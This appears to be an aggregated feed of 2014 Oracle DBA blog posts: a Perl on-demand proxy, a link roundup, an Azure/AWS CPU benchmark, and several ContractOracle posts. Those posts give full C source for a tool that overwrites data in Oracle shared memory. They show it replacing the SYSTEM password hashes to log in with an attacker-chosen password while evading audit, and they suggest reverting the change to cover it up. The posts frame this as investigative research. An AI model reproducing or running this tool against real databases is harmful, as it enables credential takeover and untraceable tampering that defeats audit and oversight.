
DBA Blogs

OTN Latin America Tour, 2014

Hans Forbrich - Fri, 2014-07-11 17:12
The dates and the speakers for the Latin America Tour have been announced.

http://www.oracle.com/technetwork/es/community/user-groups/otn-latinoamerica-tour-2014-2213115-esa.html


Categories: DBA Blogs

A Ringleader Proxy for Sporadically-Used Web Applications

Pythian Group - Fri, 2014-07-11 08:46

As you might already know, I come up with my fair share of toy web applications.

Once created, I typically throw them on my server for a few weeks but, as the resources of good ol’ Gilgamesh are limited, they eventually have to be turned off to make room for the next wave of shiny new toys. Which is a darn shame, as some of them can be useful from time to time. Sure, running all webapps all the time would be murder for the machine, but there should be a way to only fire up the application when it’s needed.

Of course there’s already a way of doing just that. You might have heard of it: it’s called CGI. And while it’s perfectly possible to run PSGI applications under CGI, it’s also… not quite perfect. The principal problem is that since there is no persistence at all between requests (of course, with the help of mod_perl there could be persistence, but that would defeat the purpose), so it’s not exactly snappy. Although, to be fair, it’d probably be still fast enough for most small applications. But still, it feels clunky. Plus, I’m just plain afraid that if I revert to using CGI, Sawyer will burst out of the wall like a vengeful Kool-Aid Man and throttle the life out of me. He probably wouldn’t, but I prefer not to take any chances.

So I don’t want single executions and I don’t want perpetual running. What I’d really want is something in-between. I’d like the applications to be disabled by default, but if a request comes along, to be awaken and ran for as long as there is traffic. And only once the traffic has abated for a reasonable amount of time do I want the application to be turned off once more.

The good news is that it seems that Apache’s mod_fastcgi can fire dynamic applications upon first request. If that’s the case, then the waking-up part of the job comes for free, and the shutting down is merely a question of periodically monitoring the logs and killing processes when inactivity is detected.

The bad news is that I only heard that after I was already halfway done shaving that yak my own way. So instead of cruelly dropping the poor creature right there and then, abandoning it with a punk-like half-shave, I decided to go all the way and see how a Perl alternative would look.

It’s all about the proxy

My first instinct was to go with Dancer (natch). But a quick survey of the tools available revealed something even more finely tuned to the task at hand: HTTP::Proxy. That module does exactly what it says on the tin: it proxies HTTP requests, and allows you to fiddle with the requests and responses as they fly back and forth.

Since I own my domain, all my applications run on their own sub-domain name. With that setup, it’s quite easy to have all my sub-domains point to the port where that proxy runs, and have the waking-up-if-required and the dispatch to the real application done as the request comes in.


use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time = 5;
my $shutdown_delay = 10;

my %services = (
    'foo.babyl.ca' => $foo_config,
    'bar.babyl.ca' => $bar_config,

);

$proxy->push_filter( request => 
    HTTP::Proxy::HeaderFilter::simple->new( sub {

            my( $self, $headers, $request ) = @_;

            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $service->is_running ) {
                $service->start;
                sleep 1;
            }

            # store the latest access time
            $service->store_access_time(time);
    }),
);

$proxy->start;

With this, we already have the core of our application; we only need a few more pieces and details to iron out.

Enter Sandman

An important one is how to detect if an application is running, and when it goes inactive. For that I went with a simple mechanism: CHI provides me with a persistent, central place to keep information about my applications. As soon as an application comes up, I store the time of the current request in its cache, and each time a new request comes in, I update the cache with the new time. That way, the existence of the cache tells me if the application is running, and knowing if the application should go dormant is just a question of seeing if the last access time is old enough.


use CHI;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);

...;

# when checking if the host is running
unless ( $chi->get($host) ) {
    $service->start;
    sleep 1;
}

...;

# and storing the access time becomes
$chi->set( $host => time );

# to check periodically, we fork a sub-process 
# and we simply endlessly sleep, check, then sleep
# some more

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $s = shift;

    my $time = $chi->get($s);

    # no cache (not running) or recent activity? nothing to do
    return if !$time or time - $time <= $shutdown_delay;

    $services{$s}->stop;

    $chi->remove($s);
}

Minding the applications

The final remaining big piece of the puzzle is how to manage the launching and shutting down of the applications. We could do it in a variety of ways, beginning with plain system calls. Instead, I decided to leverage the service manager Ubic. With the help of Ubic::Service::Plack, setting up a PSGI application as a service is as straightforward as one could wish for:


use Ubic::Service::Plack;

Ubic::Service::Plack->new({
    server => "FCGI",
    server_args => { listen => "/tmp/foo_app.sock",
                     nproc  => 5 },
    app      => "/home/web/apps/foo/bin/app.pl",
    port     => 4444,
});

Once the service is defined, it can be started and stopped from the CLI. And, more interestingly for us, straight from Perl-land:


use Ubic;

my %services = (
    # sub-domain      # ubic service name
    'foo.babyl.ca' => 'webapp.foo',
    'bar.babyl.ca' => 'webapp.bar',
);

$_ = Ubic->service($_) for values %services;

# and then to start a service
$services{'foo.babyl.ca'}->start;

# or to stop it
$services{'foo.babyl.ca'}->stop;

# other goodies can be gleaned too, like the port...
$services{'foo.babyl.ca'}->port;

Now all together

And that’s all we need to get our ringleader going. Putting it all together, and tidying it up a little bit, we get:


use 5.20.0;

use experimental 'postderef';

use HTTP::Proxy;
use HTTP::Proxy::HeaderFilter::simple;

use Ubic;

use CHI;

my $proxy = HTTP::Proxy->new( port => 3000 );

my $wait_time      = 5;
my $shutdown_delay = 10;

my $ubic_directory = '/Users/champoux/ubic';

my %services = (
    'foo.babyl.ca' => 'webapp.foo',
);

$_ = Ubic->service($_) for values %services;

# not a good cache driver for the real system
# but for testing it'll do
my $chi = CHI->new(
    driver => 'File',
    root_dir => 'cache',
);


$proxy->push_filter( request => HTTP::Proxy::HeaderFilter::simple->new(sub{
            my( $self, $headers, $request ) = @_;
            my $uri = $request->uri;
            my $host = $uri->host;

            my $service = $services{ $host } or die;

            $uri->host( 'localhost' );
            $uri->port( $service->port );

            unless ( $chi->get($host) ) {
                $service->start;
                sleep 1;
            }

            # always store the latest access time
            $chi->set( $host => time );
    }),
);

start_sandman();

$proxy->start;

sub start_sandman {
    return if fork;

    while( sleep $shutdown_delay ) {
        check_activity_for( $_ ) for keys %services;
    }
}

sub check_activity_for {
    my $service = shift;

    my $time = $chi->get($service);

    # no cache (not running) or recent activity? nothing to do
    return if !$time or time - $time <= $shutdown_delay;

    $services{$service}->stop;

    $chi->remove($service);
}

It’s not yet completed. The configuration should go in a YAML file, we should have some more safeguards in case the cache and the real state of the application aren’t in sync, and the script itself should be started by Unic too to make everything Circle-of-Life-perfect. Buuuuut as it is, I’d say it’s already a decent start.

Categories: DBA Blogs

Log Buffer #379, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-11 07:34

During summer in the Northern hemisphere and winter in the Southern hemisphere, bloggers are solving key problems while sitting beside the bonfire or enjoying the bbq. This Log Buffer Edition shares both of these with them.


Oracle:

3 Key Problems To Solve If You Want A Big Data Management System

OpenWorld Update: Content Catalog NOW LIVE!

Interested in Showcasing your Solutions around Oracle Technologies at Oracle OpenWorld?

GoldenGate and Oracle Data Integrator – A Perfect Match in 12c… Part 4: Start Journalizing!

What You Need to Know about OBIEE 11.1.1.7

SQL Server:

Interoperability between Microsoft and SOA Suite 12c

This article describes a way to speed up various file operations performed by SQL Server.

The Mindset of the Enterprise DBA: Creating and Applying Standards to Our Work

Stairway to T-SQL: Beyond The Basics Level 8: Coding Shortcuts using += and -= Operators

Microsoft Azure Diagnostics Part 2: Basic Configuration of Azure Cloud Service Diagnostics

MySQL:

MySQL Enterprise Monitor 2.3.18 has been released

Harnessing the power of master/slave clusters to operate data-driven businesses on MySQL

NoSQL Now! Conference – coming to San Jose, CA this August!

Manually Switch Slaves to new Masters in mySQL 5.6 (XTRADB 5.6)

How to Configure ClusterControl to run on nginx

Categories: DBA Blogs

How to directly update Oracle password hashes in SGA while avoiding DB security and audit.

ContractOracle - Fri, 2014-07-11 03:22
My previous blog posts showed it was possible to directly update table data in the SGA and bypass audit and database level security.    The following example expands on that to show how to modify password hashes in the SGA to allow connection to the database without changing passwords in datafiles.

Basically we updated the password hashes in SGA to known values for user SYSTEM using the following 3 commands :-

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


Output from the DB side is as follows.

First generate a set of password hashes for user SYSTEM with password "badguy".

CDB$ROOT@ORCL> alter user system identified by badguy;

User altered.


CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
E235D5FC5165F1EC
S:319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179;H:E30710ABA2D3492243C239A8854B4E21

Next find the password hashes that need to be replaced.  Below we use sqlplus to extract them from user$, but we could also read them directly from datafile or SGA without logging into the database.

CDB$ROOT@ORCL> alter user system identified by goodguy;

User altered.

CDB$ROOT@ORCL> select password, spare4 from user$ where name = 'SYSTEM';

PASSWORD
--------------------------------------------------------------------------------
SPARE4
--------------------------------------------------------------------------------
09F3A178C7F6F650
S:5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0;H:076F596A5F2AD47593407D24734BF6C0

Demonstrate login using the "goodguy" password.

CDB$ROOT@ORCL> connect system/goodguy;
Connected.

Now replace the password hashes in SGA with the known password hashes for password "badguy".

./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC

./sga_data_replace 5550E8A22A9137A65F53EE87DF92415016E8CAFAFAFCE861CEF6D6403BC0 319C0B95B6F463C53B5375556C34B54A80C346529CBBBB68268F361DC179


./sga_data_replace 076F596A5F2AD47593407D24734BF6C0 E30710ABA2D3492243C239A8854B4E21


And test to confirm that we can now login using password "badguy".

CDB$ROOT@ORCL> connect system/badguy;
Connected.

This shows that the password hash values in the SGA were updated, that the database did not crash or detect the data change, and that it allowed direct login with the modified hashes.  Since the change was only made to data in memory, there is no audit record and no evidence in the datafiles (unless a transaction updates the modified blocks and commits them back to disk).  It would also be possible to back out the changes made to the SGA, restoring the original hash values, to cover up completely.
Sample output from the first SGA update command above follows :-
[oracle@localhost shared_memory]$ ./sga_data_replace 09F3A178C7F6F650 E235D5FC5165F1EC


WARNING WARNING WARNING

This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.

USAGE :- sga_data_replace searchstring replacestring

Number of input parameters seem correct.
Length of search parameter 09F3A178C7F6F650 matches replace parameter E235D5FC5165F1EC
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- 09F3A178C7F6F650
REPLACE WITH :- E235D5FC5165F1EC
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_76 replace string at 2099160
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2271972
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_76 replace string at 2320344
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_75 replace string at 994020
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_68 replace string at 2624228
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_37 replace string at 450614
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
/dev/shm/ora_orcl_20381697_35 replace string at 695886
replace 0 with E
replace 9 with 2
replace F with 3
replace 3 with 5
replace A with D
replace 1 with 5
replace 7 with F
replace 8 with C
replace C with 5
replace 7 with 1
replace F with 6
replace 6 with 5
replace F with F
replace 6 with 1
replace 5 with E
replace 0 with C
Error: File is empty, nothing to do
Categories: DBA Blogs

C program to find/replace data in Oracle SGA.

ContractOracle - Fri, 2014-07-11 02:49
Following is a proof of concept program to change data in Oracle shared memory mapped to /dev/shm
It uses shm_open and mmap to cleanly open and close the existing shared files, search for a string, and replace it.   I have tested it on Linux against Oracle 12C databases, changing data in SGA without crashing the database, but it should also work against 11g.  It won't work against Oracle versions prior to 11g as they manage shared memory in a different manner (Sample program here ).

I am happy for anyone to copy and/or modify this code, but be aware that this program has the potential to crash or corrupt any database on the server where it is run.  Sample output can be found here.

To compile it on Linux :-

gcc sga_data_replace.c -o sga_data_replace -lrt

Note that this blog may strip out some symbols, so if you have issues compiling please check syntax (especially in the include section).

[oracle@localhost shared_memory]$ more sga_data_replace.c
#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/file.h>
#include <sys/mman.h>
#include <sys/stat.h>

void replace_sga(char search_string[], char replace_string[])
{
  DIR           *d;
  struct dirent *dir;
  char *data;
  char *memname;
  int i,j;
  int search_length = strlen(search_string);
  int replace_length = strlen(replace_string);
  d = opendir("/dev/shm");

  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      memname = dir->d_name;
      if (strstr(memname,"ora"))
      {
        //printf("Opening %s\n",memname);
        int fd = shm_open(memname, O_RDWR, 0660);

        if (fd == -1)
        {
          perror("Error opening file for reading");
          exit(EXIT_FAILURE);
        }

        struct stat fileInfo = {0};

        if (fstat(fd, &fileInfo) == -1)
        {
          perror("Error getting the file size");
          exit(EXIT_FAILURE);
        }

        if (fileInfo.st_size == 0)
        {
          fprintf(stderr, "Error: File is empty, nothing to do\n");
          exit(EXIT_FAILURE);
        }

        data = mmap(0, fileInfo.st_size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);

        if (data == MAP_FAILED)
        {
          close(fd);
          perror("Error mmapping the file");
          exit(EXIT_FAILURE);
        }

        // stop search_length bytes before the end of the mapping to avoid reading past it
        for (i = 0; i <= fileInfo.st_size - search_length; i++)
        {
          for (j = 0; j < replace_length; j++)
          {
            if (data[i+j] != search_string[j])
              break;
          }

          if (j==replace_length)
          {
            printf("/dev/shm/%s replace string at %d\n",memname,i);
            for (j = 0; j < replace_length; j++)
            {
              printf("replace %c with %c\n",data[i+j],replace_string[j]);
              data[i+j] = replace_string[j];                  
            }
          }
        }
        munmap(data, fileInfo.st_size);  // unmap before moving on to the next segment
        close(fd);
      }
    }
  }
  closedir(d);
}

int main(int argc, char *argv[])
{
printf("\n\n\nWARNING WARNING WARNING\n\n\n");
printf("This program may crash or corrupt your Oracle database!!! ");
printf("It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. ");
printf("Anyone may copy or modify the code provided.\n\n\n");
printf("USAGE :- sga_data_replace \n\n\n");

  if (argc == 3 && strlen(argv[1]) == strlen(argv[2]))
  {
    printf("Number of input parameters seem correct.\n");
    printf("Length of search parameter %s matches replace parameter %s\n",argv[1],argv[2]);
    printf("This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.\n");
    printf("SEARCH FOR   :- %s\n",argv[1]);
    printf("REPLACE WITH :- %s\n",argv[2]);
    printf("Enter Y to continue :- ");

    char    user_input;
    scanf("  %c", &user_input );
    user_input = toupper( user_input );
    if(user_input == 'Y')
    {
      replace_sga(argv[1],argv[2]);
    }
  }
  else
  {
    printf("The program expects two parameters the same number of characters.\n");
  }
  return 0;
}

Categories: DBA Blogs

Sample output from program to update data in Oracle shared memory.

ContractOracle - Fri, 2014-07-11 02:45
Following is an example of updating Oracle data in shared memory.

From the database side we can see that only the data in SGA was changed, and the data on disk remained untouched.  (verified by flushing the buffer cache and forcing a re-read from disk)


CDB$ROOT@ORCL> create table test (text char(6));

Table created.

CDB$ROOT@ORCL> insert into test values ('vendor');

1 row created.

CDB$ROOT@ORCL> commit;

Commit complete.

CDB$ROOT@ORCL> select * from test;

TEXT
------
badguy

CDB$ROOT@ORCL> alter system flush buffer_cache;

System altered.

CDB$ROOT@ORCL> select * from test;

TEXT
------
vendor



Following is sample output from my program to update data in Oracle shared memory.  In this case it connected to every shared memory file in /dev/shm and replaced all strings "vendor" with "badguy".

[oracle@localhost shared_memory]$ ./sga_data_replace vendor badguy



WARNING WARNING WARNING


This program may crash or corrupt your Oracle database!!! It was written purely as an investigative tool and the author does not guarantee it will work, and does not recommend running it against PROD databases. Anyone may copy or modify the code provided.


USAGE :- sga_data_replace searchstring replacestring


Number of input parameters seem correct.
Length of search parameter vendor matches replace parameter badguy
This program will connect to all shared memory segments in /dev/shm belonging to all running databases on the server.
SEARCH FOR   :- vendor
REPLACE WITH :- badguy
Enter Y to continue :- Y
/dev/shm/ora_orcl_20381697_91 replace string at 366592
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_82 replace string at 3238216
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_75 replace string at 2230653
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361711
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_73 replace string at 1361718
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
/dev/shm/ora_orcl_20381697_62 replace string at 1081334
replace v with b
replace e with a
replace n with d
replace d with g
replace o with u
replace r with y
Error: File is empty, nothing to do

Categories: DBA Blogs

Installing OEL 6 and Database 12c

Hemant K Chitale - Thu, 2014-07-10 08:25
Here is a collection of posts on installing (a) Virtual Box (b) Oracle Enterprise Linux 6 (c) 12c Grid Infrastructure (Standalone, non-Clustered) and ASM (d) 12c Database with CDB and PDB.
.
.
.

Categories: DBA Blogs

Comparing CPU Throughput of Azure and AWS EC2

Pythian Group - Thu, 2014-07-10 08:11

After observing CPU core sharing with Amazon Web Services EC2, I thought it would be interesting to see if Microsoft Azure platform exhibits the same behavior.

Signing up for Azure’s 30-day trial gives $200 in credit to use over the next 30-day period: more than enough for this kind of testing. I created a new virtual machine using the “quick create” option with Oracle Linux, choosing a 4-core “A3” standard instance.

I must say I like the built-in “cloudapp.net” DNS naming that Azure uses: no mucking around with IP addresses. The VM provisioning definitely takes longer than on AWS, though no more than a few minutes. And speaking of IP addresses, both machines start with 191.236. addresses assigned to Microsoft’s Brazilian subsidiary through the Latin American LACNIC registry, due to the shortage of North American IP addresses.

Checking out the CPU specs as reported to the OS:

[azureuser@marc-cpu ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.990
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

2.2GHz rather than 2.6GHz, but otherwise the same family and architecture as the E5-2670 under AWS. Identified as a single-socket, 4-core processor, without hyperthreads at all.

Running the tests
[azureuser@marc-cpu ~]$ taskset -pc 0 $$
pid 1588's current affinity list: 0-3
pid 1588's new affinity list: 0
[azureuser@marc-cpu ~]$ dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 36.9319 s, 58.8 MB/s
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 72.8379 s, 29.8 MB/s
2170552320 bytes (2.2 GB) copied, 73.6173 s, 29.5 MB/s

Pretty low; that’s half the throughput we saw on AWS, albeit with a slower clock speed here.

[azureuser@marc-cpu ~]$ taskset -pc 0,1 $$
pid 1588's current affinity list: 0
pid 1588's new affinity list: 0,1
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.4285 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.7957 s, 59.0 MB/s

[azureuser@marc-cpu ~]$ taskset -pc 0,2 $$
pid 1588's current affinity list: 0,1
pid 1588's new affinity list: 0,2
[azureuser@marc-cpu ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu ~]$ 2170552320 bytes (2.2 GB) copied, 36.3998 s, 59.6 MB/s
2170552320 bytes (2.2 GB) copied, 36.776 s, 59.0 MB/s

Pretty consistent results, so no core sharing, but running considerably slower than we saw with AWS.

Kicking off 20 runs in a row:

[azureuser@marc-cpu ~]$ taskset -pc 0-3 $$
pid 1588's current affinity list: 0,2
pid 1588's new affinity list: 0-3
[azureuser@marc-cpu ~]$ for run in {1..20}; do
>  for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      1 59.1
      4 59.2
      1 59.3
      2 59.4
      2 59.5
      8 59.6
     12 59.7
      7 59.8
      3 59.9

We get very consistent results, between 59.1 and 59.9 MB/s.

Results from “top” while running:

cat > ~/.toprc <<-EOF
RCfile for "top with windows"           # shameless braggin'
Id:a, Mode_altscr=0, Mode_irixps=1, Delay_time=3.000, Curwin=0
Def     fieldscur=AEHIOQTWKNMbcdfgjplrsuvyzX
        winflags=25913, sortindx=10, maxtasks=2
        summclr=1, msgsclr=1, headclr=3, taskclr=1
Job     fieldscur=ABcefgjlrstuvyzMKNHIWOPQDX
        winflags=62777, sortindx=0, maxtasks=0
        summclr=6, msgsclr=6, headclr=7, taskclr=6
Mem     fieldscur=ANOPQRSTUVbcdefgjlmyzWHIKX
        winflags=62777, sortindx=13, maxtasks=0
        summclr=5, msgsclr=5, headclr=4, taskclr=5
Usr     fieldscur=ABDECGfhijlopqrstuvyzMKNWX
        winflags=62777, sortindx=4, maxtasks=0
        summclr=3, msgsclr=3, headclr=2, taskclr=3
EOF
[azureuser@marc-cpu ~]$  top -b -n20 -U azureuser
...
top - 14:38:41 up 2 min,  2 users,  load average: 2.27, 0.78, 0.28
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 95.4%us,  4.6%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu3  :  0.0%us,  0.3%sy,  0.0%ni, 99.7%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1606 azureuse  20   0  4292  800  400 R 97.0  0.0   0:03.49 gzip
 1604 azureuse  20   0  4292  796  400 R 96.7  0.0   0:03.50 gzip

top - 14:38:44 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.4%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.5%si,  0.0%st
Cpu1  :  0.0%us,  0.0%sy,  0.0%ni,100.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu2  : 72.3%us,  3.9%sy,  0.0%ni, 23.4%id,  0.0%wa,  0.0%hi,  0.4%si,  0.0%st
Cpu3  : 12.0%us,  0.7%sy,  0.0%ni, 85.6%id,  1.4%wa,  0.0%hi,  0.4%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.8  0.0   0:06.42 gzip
 1606 azureuse  20   0  4292  800  400 R 96.4  0.0   0:06.40 gzip

top - 14:38:47 up 2 min,  2 users,  load average: 2.25, 0.80, 0.29
Tasks: 205 total,   3 running, 202 sleeping,   0 stopped,   0 zombie
Cpu0  : 94.9%us,  5.1%sy,  0.0%ni,  0.0%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu1  :  9.7%us,  0.3%sy,  0.0%ni, 89.7%id,  0.0%wa,  0.0%hi,  0.3%si,  0.0%st
Cpu2  : 51.8%us,  2.8%sy,  0.0%ni, 45.4%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st
Cpu3  : 17.9%us,  1.4%sy,  0.0%ni, 80.6%id,  0.0%wa,  0.0%hi,  0.0%si,  0.0%st

  PID USER      PR  NI  VIRT  RES  SHR S %CPU %MEM    TIME+  COMMAND
 1604 azureuse  20   0  4292  796  400 R 96.5  0.0   0:09.34 gzip
 1606 azureuse  20   0  4292  800  400 R 95.5  0.0   0:09.29 gzip

It’s using full CPUs and all from gzip, so no large system overhead here. Also, “%st”, time reported “stolen” by the hypervisor, is zero. We’re simply getting half the throughput of AWS.

Basic instances

In addition to standard instances, Microsoft makes available basic instances, which claim to offer “similar machine configurations as the Standard tier of instances offered today (Extra Small [A0] to Extra Large [A4]). These instances will cost up to 27% less than the corresponding instances in use today (which will now be called “Standard”) and do not include load balancing or auto-scaling, which are included in Standard” (http://azure.microsoft.com/blog/2014/03/31/microsoft-azure-innovation-quality-and-price/)

Let’s have a look at throughput here by creating a basic A3 instance, “marc-cpu-basic”, that otherwise exactly matches the marc-cpu instance created earlier.

[azureuser@marc-cpu-basic ~]$ egrep '(processor|model name|cpu MHz|physical id|siblings|core id|cpu cores)' /proc/cpuinfo
processor       : 0
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 0
cpu cores       : 4
processor       : 1
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 1
cpu cores       : 4
processor       : 2
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 2
cpu cores       : 4
processor       : 3
model name      : Intel(R) Xeon(R) CPU E5-2660 0 @ 2.20GHz
cpu MHz         : 2199.993
physical id     : 0
siblings        : 4
core id         : 3
cpu cores       : 4

CPU specs are identical to marc-cpu. Running the same tests:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0 $$
pid 1566's current affinity list: 0-3
pid 1566's new affinity list: 0
[azureuser@marc-cpu-basic ~]$  dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null
2170552320 bytes (2.2 GB) copied, 54.6678 s, 39.7 MB/s
for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
[azureuser@marc-cpu-basic ~]$ for i in {1..2}; do (dd if=/dev/zero bs=1M count=2070 2> >(grep bytes >&2 ) | gzip -c > /dev/null &) done
2170552320 bytes (2.2 GB) copied, 107.73 s, 20.1 MB/s
2170552320 bytes (2.2 GB) copied, 107.846 s, 20.1 MB/s

Now that’s very slow: even with the identical stated CPU specs as marc-cpu, marc-cpu-basic comes in with 33% less throughput.

Doing 20 runs in a row:

[azureuser@marc-cpu-basic ~]$ taskset -pc 0-3 $$
pid 1566's current affinity list: 0
pid 1566's new affinity list: 0-3
[azureuser@marc-cpu-basic ~]$ for run in {1..20}; do
> for i in {1..2}; do dd if=/dev/zero bs=1M count=2070 2>> output | gzip -c > /dev/null & done
> wait
> done
...
[azureuser@marc-cpu-basic ~]$ cat output | awk '/copied/ {print $8}' | sort | uniq -c
      4 40.4
     15 40.5
     14 40.6
      7 40.7

Very consistent results, but consistently slow. They do show that cores aren’t being shared, but throughput is lower than even a shared core under AWS.

Wrapping up

Comparison chart

Under this simple gzip test, we are testing CPU integer performance. The Azure standard instance got half the throughput of the equivalent AWS instance, in spite of a clock speed only 15% slower. But the throughput was consistent: no drops when running on adjacent cores. The basic instance was a further 33% slower than a standard instance, in spite of having the same CPU configuration.

